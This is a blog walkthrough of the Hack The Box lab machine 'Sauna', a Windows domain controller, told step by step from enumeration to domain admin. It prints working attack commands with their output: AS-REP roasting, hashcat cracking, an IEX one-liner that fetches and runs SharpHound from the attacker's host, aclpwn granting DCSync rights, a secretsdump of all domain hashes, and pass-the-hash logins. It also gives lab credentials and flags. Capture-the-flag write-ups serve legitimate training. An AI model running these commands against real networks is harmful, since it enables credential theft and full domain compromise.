HackTheBox WriteUp Sauna

Hack The Box Writeup: Sauna

After the JSON box has been phased out, a new Microsoft Windows box has been released. Under the name Sauna, this “Easy” box went live on February 15th for everyone to go wild with a good dose of DCSync power!

Hack The Box Sauna Infocard

[0x1] Reconnaissance & Enumeration

First step: the Nmap scan. The default Windows Server ports are visible and port 80 probably serves a website based on IIS 10.0

nmap -sV -sC -oA sauna 10.10.10.175

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 07:41 GMT


Nmap scan report for 10.10.10.175
Host is up (0.068s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-16 15:43:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/16%Time=5E48F264%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m56s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-16T15:45:43
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 350.43 seconds

The website of the Egotistic Bank is shown at http://10.10.10.175. The maker of this box is Egotistic, so well…. that suddenly explains a lot.

There is little interesting to find while searching for usernames. Enum4linux gives no output and other tools remain silent as well. I always like to grab the “Team” pages of a website. Here you will often find hints to users. In this case, there are indeed a few to be found.

[0x2] Initial Foothold

A bit of brute force then. I’ve listed users.txt in users.txt based on default naming conventions. I take the first name, first name and first letter of the last name and first letter of the first name + last name. Let’s see if this pays off.

cat users.txt 
hugo
hugos
hsmith
fsmith
ferguss
shaun
scoins
shaunc
sophie
sdrivers
sophied
bowie
bowiet
btaylor
steven
stevenk
skerb

Using the GetNPUsers.py I search for accounts in the list from which I can grab the Ticket Granting Ticket (TGT). These are accounts with the option “Do not require Kerberos Preauthentication” on. I already choose to write any hashes in hascat format so that they will be easy to crack later.

python /usr/share/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.local/ -usersfile ~/Documents/boxes/sauna/users.txt -format hashcat -outputfile ~/Documents/boxes/sauna/kerb-hashes.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

The script is ready fairly quickly and an account is indeed found from which the TGT can be taken. The other accounts don’t seem to exist.

cat ~/Documents/boxes/sauna/kerb-hashes.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde10e47a9921a82142cdeffd9ee5$d2ba9245d73b954023d9f1b3a288386775b342144f8575548b4f72e8d026faece1fef842e19d29eed6f0707b08c981cbbc56bd6743e6e73e8f61cb645fdd2a7bd1746aeb2cc9658d62260896f882f591cfd81e1bb04ea5b0b4e6234f20c30658c3779e8d6af266aa1a23561599da9a89ea3d17138740707b43e832eee338693beaf3a87bfe82f239be3b5c92c65149cf1badec07579e2e499f1030bc1f9c87ddf3e34ab164349c9d73f6df34f158df7968891a25379f807ef4cb8e477f6c9e9ff5dfd7c9966f6c0c0ebc2d82e3e4a75e897e26b99a3a32bb6234609e263a87f7899c0320c05e4901a25447acfa873baafffe6d4ec74d306623e2b7e27144312c

The hash goes straight to Hashcat and based on the Rockyou wordlist, the password is retrieved within 40 seconds.

hashcat -m 18200 ~/Documents/boxes/sauna/kerb-hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 1024/2955 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.b9f808b5.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde10e47a9921a82142cdeffd9ee5$d2ba9245d73b954023d9f1b3a288386775b342144f8575548b4f72e8d026faece1fef842e19d29eed6f0707b08c981cbbc56bd6743e6e73e8f61cb645fdd2a7bd1746aeb2cc9658d62260896f882f591cfd81e1bb04ea5b0b4e6234f20c30658c3779e8d6af266aa1a23561599da9a89ea3d17138740707b43e832eee338693beaf3a87bfe82f239be3b5c92c65149cf1badec07579e2e499f1030bc1f9c87ddf3e34ab164349c9d73f6df34f158df7968891a25379f807ef4cb8e477f6c9e9ff5dfd7c9966f6c0c0ebc2d82e3e4a75e897e26b99a3a32bb6234609e263a87f7899c0320c05e4901a25447acfa873baafffe6d4ec74d306623e2b7e27144312c:Thestrokes23 

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde1...44312c
Time.Started.....: Sun Feb 16 09:17:01 2020 (21 secs)
Time.Estimated...: Sun Feb 16 09:17:22 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 510.1 kH/s (6.79ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Teague51

Started: Sun Feb 16 09:16:45 2020
Stopped: Sun Feb 16 09:17:23 2020

I can continue searching on Sauna knowing that the account fsmith with password Thestrokes23 is usable. There are some shares available, however the account has no rights to them. Not very interesting to find so I switch to logging in via Windows Remote Management using the tool Evil-WINRM.

evil-winrm -u fsmith -p "Thestrokes23" -i 10.10.10.175

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>

[0x3] Path to User flag

Connection was successful. First check if this account is the holder of the user flag in its Desktop folder. It looks like it is.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt     

There it is, the user-flag of Sauna. This makes the first part of this box in the pocket. There isn’t really much to do from the initial foothold, since the foothold is already the User path.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf

[0x4] Path to Root flag

One of the first checks is always the C: \ Users folder on a Windows Server. Here you will quickly find any hints to other users on the machine. In this case, svc_loanmgr stands out.

*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr 

After a lot of enumeration, I eventually arrive at the registry via a tip. The password should be stored here and I am using a search query to search the registry for a string containing the word password. He likes this for a while and eventually I got hold of the password for the service account. The account is configured to login automatically and therefore the password can be found in plain text in the Winlogon hive.

reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword REG_SZ Moneymakestheworldgoround!

With the new account I do the same thing as with fsmith . Log in with Evil-WINRM to see what’s possible with this account.

evil-winrm -u "svc_loanmgr" -p "Moneymakestheworldgoround!" -i 10.10.10.175

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

After looking around for a while I don’t find anything interesting. After the Forest box I got some experience with BloodHound and I choose it here to see if I can find a path to any DCSync permissions with it. I am offering SharepHound via my machine so that I have can download and run. I then download the output for further analysis in Bloodhoud.

powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.18:8000/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 2:38 PM on 2/16/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 60/s --- Using 76 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:01.9931054
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\20200216143837_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

Before I can start BloodHound the Neo4j platform has to be running. This is only 1 command. If you experience problems with pid-locks error messages, please update your version of neo4j with apt-get install neo4j .

neo4j console

When neo4j has started it is BloodHounds turn.

bloodhound

I’m importing the output from the machine under the svc_loanmgr account to see the shortest path to Domain Admin. However, this does not yield more than needing the Administrator account . With a query to look for DCSync permissions I get more output.

Yet it is not yet clear what is needed. Via a blog of Dirk-jan Mollema I ended up with one of his tools as an extension of Bloodhound called: ACLPWN. Based on Bloodhound you determine the start and the end goal and then you use ACLPWN to do a “dry” test run first and then actually perform the actions to grab DCSync rights. You can install ACLPWN from Github via PIP.

pip install aclpwn 

First, I do a quick check with the -dry parameter. The path is correct and there is indeed a possibility to obtain DCSync.

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local -dry

[+] Path found!
Path: (SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL)-[GetChangesAll]->(EGOTISTICAL-BANK.LOCAL)
[+] Path validated, the following modifications are required for exploitation in the current configuration:
[-] DCSync -> continue

And then for real. Without the -Dry parameter, ACLPWN immediately submits the changes and gives svc_loanmgr the desired permissions..

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local
Please supply the password or LM:NTLM hashes of the account you are escalating from: 
[+] Path found!
Path: (SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL)-[GetChangesAll]->(EGOTISTICAL-BANK.LOCAL)
[-] DCSync -> continue
[+] Finished running tasks

Now it is only a matter of requesting a sync from the domain controller, in this case Sauna, and writing the hashes to adhashes.txt .

python /usr/share/impacket/examples/secretsdump.py egotistical-bank/svc_loanmgr@10.10.10.175 -just-dc -outputfile adhashes.txt

All local and domain accounts are neatly written for further processing.

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7a2965077fddedf348d938e4fa20ea1b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:a90968c91de5f77ac3b7d938bd760002373f71e14e1a027b2d93d1934d64754a
SAUNA$:aes128-cts-hmac-sha1-96:0bf0c486c1262ab6cf46b16dc3b1b198
SAUNA$:des-cbc-md5:b989ecc101ae4ca1
[*] Cleaning up...

Why make it difficult when it can also be easy. No John the Ripper or Hashcat, just use the hash to login with Evil-WINRM. The root.txt is already waiting for me on the desktop.

evil-winrm -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i 10.10.10.175

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
    Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 1/23/2020 10:22 AM 32 root.txt 

Do you even got root bro? Well, now I have 🙂 Interesting box where the methods weren’t that complicated, but a lot of time is spent in the enumeration.

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
f3ee04965c68257382e31502cc5e881f


[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Add comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Your Header Sidebar area is currently empty. Hurry up and add some widgets.